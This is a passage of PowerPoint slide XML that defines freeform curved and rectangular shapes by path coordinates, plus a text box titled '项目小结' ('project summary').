            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="400050" h="409575">
                <a:moveTo>
                  <a:pt x="200025" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="154155" y="5408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112050" y="20814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74911" y="44986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43937" y="76694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20327" y="114707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5281" y="157793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="204724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5281" y="251701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20327" y="294821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43937" y="332856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74911" y="364578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112050" y="388757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="154155" y="404165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200025" y="409575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245894" y="404165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287999" y="388757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325138" y="364578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356112" y="332856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379722" y="294821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394768" y="251701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400050" y="204724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394768" y="157793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379722" y="114707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356112" y="76694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325138" y="44986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287999" y="20814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245894" y="5408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200025"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16" name="Freeform 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5500623"/>
            <a:ext cx="748030" cy="600710"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="748030" h="600710">
                <a:moveTo>
                  <a:pt x="747711" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="745906" y="46903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740578" y="92818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="731862" y="137613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719891" y="181153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="704799" y="223305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686718" y="263935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665782" y="302911"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="642125" y="340099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="615879" y="375365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587180" y="408577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="556159" y="439600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522950" y="468301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="487687" y="494548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="450503" y="518207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="411531" y="539143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370906" y="557225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="328759" y="572318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="285226" y="584289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240439" y="593005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194531" y="598333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="600138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100740" y="598333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54831" y="593005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10042" y="584289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="58152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7" name="Freeform 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2014473"/>
            <a:ext cx="748030" cy="3486150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="748030" h="3486150">
                <a:moveTo>
                  <a:pt x="0" y="18615"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10046" y="15852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54834" y="7134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100741" y="1805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194531" y="1932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240439" y="7258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="285226" y="15972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="328759" y="27941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370906" y="43031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="411531" y="61109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="450503" y="82042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="487687" y="105696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522950" y="131938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="556159" y="160635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587180" y="191654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="615879" y="224861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="642125" y="260123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665782" y="297306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686718" y="336278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="704799" y="376906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719891" y="419054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="731862" y="462592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740578" y="507384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="745906" y="553299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="747711" y="600201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="747711" y="348615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8" name="Freeform 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5567426"/>
            <a:ext cx="938530" cy="790575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="938530" h="790575">
                <a:moveTo>
                  <a:pt x="938211" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="936768" y="48153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="932495" y="95543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="925474" y="142088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="915788" y="187705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="903519" y="232312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="888751" y="275825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871566" y="318161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852046" y="359239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="830275" y="398975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="806335" y="437286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780309" y="474091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752279" y="509306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="722328" y="542848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="690539" y="574635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="656995" y="604584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="621778" y="632613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584971" y="658638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546656" y="682577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506917" y="704348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465835" y="723867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423495" y="741052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379977" y="755820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335366" y="768088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289744" y="777774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243193" y="784795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195796" y="789068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="790511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99476" y="789068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52079" y="784795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5528" y="777774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="776600"/>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9" name="Freeform 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1766823"/>
            <a:ext cx="938530" cy="3801110"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="938530" h="3801110">
                <a:moveTo>
                  <a:pt x="0" y="13911"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5532" y="12737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52082" y="5716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99477" y="1442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195796" y="1569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243193" y="5843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289744" y="12864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335366" y="22550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379977" y="34818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423495" y="49586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465835" y="66772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506917" y="86291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546656" y="108062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584971" y="132002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="621778" y="158029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="656995" y="186059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="690539" y="216009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="722328" y="247798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752279" y="281343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780309" y="316560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="806335" y="353367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="830275" y="391682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852046" y="431421"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871566" y="472502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="888751" y="514843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="903519" y="558360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="915788" y="602971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="925474" y="648594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="932495" y="695145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="936768" y="742542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="938211" y="790701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="938211" y="380060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0" name="Freeform 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5624512"/>
            <a:ext cx="1129030" cy="981075"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1129030" h="981075">
                <a:moveTo>
                  <a:pt x="1128711" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1127580" y="47533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1124220" y="94484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1118683" y="140798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1111021" y="186427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101284" y="231317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1089525" y="275417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075794" y="318677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060143" y="361045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1042623" y="402469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1023286" y="442898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1002183" y="482281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="979366" y="520566"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="954886" y="557701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928794" y="593636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901141" y="628319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871980" y="661699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="841361" y="693724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="809336" y="724343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="775956" y="753505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="741273" y="781157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="705338" y="807249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="668202" y="831730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="629917" y="854547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590535" y="875650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550106" y="894987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508682" y="912506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466314" y="928157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423054" y="941888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="378953" y="953648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334063" y="963384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288435" y="971047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242120" y="976583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195170" y="979943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="981075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100102" y="979943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53152" y="976583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6837" y="971047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="96989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1" name="Freeform 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1509649"/>
            <a:ext cx="1129030" cy="4115435"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1129030" h="4115435">
                <a:moveTo>
                  <a:pt x="0" y="11177"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6837" y="10028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53152" y="4491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100102" y="1131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195170" y="1131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242120" y="4491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288435" y="10028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334063" y="17692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="378953" y="27429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423054" y="39190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466314" y="52922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508682" y="68574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550106" y="86095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590535" y="105434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="629917" y="126538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="668202" y="149357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="705338" y="173839"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="741273" y="199932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="775956" y="227586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="809336" y="256749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="841361" y="287369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871980" y="319395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901141" y="352776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928794" y="387459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="954886" y="423395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="979366" y="460531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1002183" y="498816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1023286" y="538198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1042623" y="578627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060143" y="620050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075794" y="662416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1089525" y="705675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101284" y="749774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1111021" y="794661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1118683" y="840287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1124220" y="886598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1127580" y="933545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1128711" y="981075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1128711" y="4114863"/>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2" name="Freeform 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4914900"/>
            <a:ext cx="2038350" cy="1762125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2038350" h="1762125">
                <a:moveTo>
                  <a:pt x="0" y="1762125"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2038350" y="1762125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2038350" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1762125"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="AutoShape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819275" y="61817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4" name="AutoShape 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819275" y="66770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5" name="AutoShape 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819275" y="6343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6" name="Freeform 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819275" y="6515100"/>
            <a:ext cx="66675" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="66675" h="57150">
                <a:moveTo>
                  <a:pt x="33274" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20359" y="2244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9779"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AutoShape 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157162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8" name="AutoShape 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157162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157162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0" name="Freeform 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157162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1" name="AutoShape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132397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2" name="AutoShape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132397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132397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4" name="Freeform 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132397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5" name="AutoShape 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858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6" name="AutoShape 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858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7" name="AutoShape 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858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8" name="Freeform 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858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9" name="AutoShape 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763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0" name="AutoShape 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763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1" name="AutoShape 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763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2" name="Freeform 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763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3" name="AutoShape 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286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4" name="AutoShape 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286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5" name="AutoShape 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286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6" name="Freeform 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286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7" name="AutoShape 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810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8" name="AutoShape 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810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9" name="AutoShape 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810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0" name="Freeform 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810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1" name="AutoShape 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875"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2" name="AutoShape 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875"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3" name="AutoShape 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875"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4" name="Freeform 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875"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5" name="TextBox 55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="3123945"/>
            <a:ext cx="5697855" cy="1029335"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="14002" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="dist">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="110"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>项目小结</a:t>
            </a:r>
            <a:endPar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56" name="Freeform 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="2581275"/>
            <a:ext cx="762000" cy="85725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="762000" h="85725">
                <a:moveTo>
                  <a:pt x="719074" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="42799" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26146" y="3367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12541" y="12557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3365" y="26199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="42925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3365" y="59578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12541" y="73183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26146" y="82359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42799" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719074" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="735800" y="82359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="749442" y="73183"/>
                </a:lnTo>
